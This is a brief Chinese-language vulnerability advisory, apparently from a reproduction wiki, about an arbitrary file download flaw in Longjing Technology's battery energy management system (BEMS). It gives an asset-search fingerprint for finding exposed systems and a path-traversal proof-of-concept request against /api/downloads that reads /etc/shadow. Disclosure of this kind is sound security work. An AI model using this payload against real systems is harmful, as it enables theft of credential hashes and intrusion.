登录 白背景

龙璟科技 电池能量BEMS downloads 任意文件下载漏洞

漏洞描述

龙璟科技 电池能量BEMS 存在接口可任意文件下载获取服务器任意文件信息

漏洞影响

龙璟科技 电池能量BEMS

网络测绘

title=电池能量管理系统 BEMS

漏洞复现

登陆页面

img

验证POC

/api/downloads?fileName=../../../../../../../../etc/shadow

img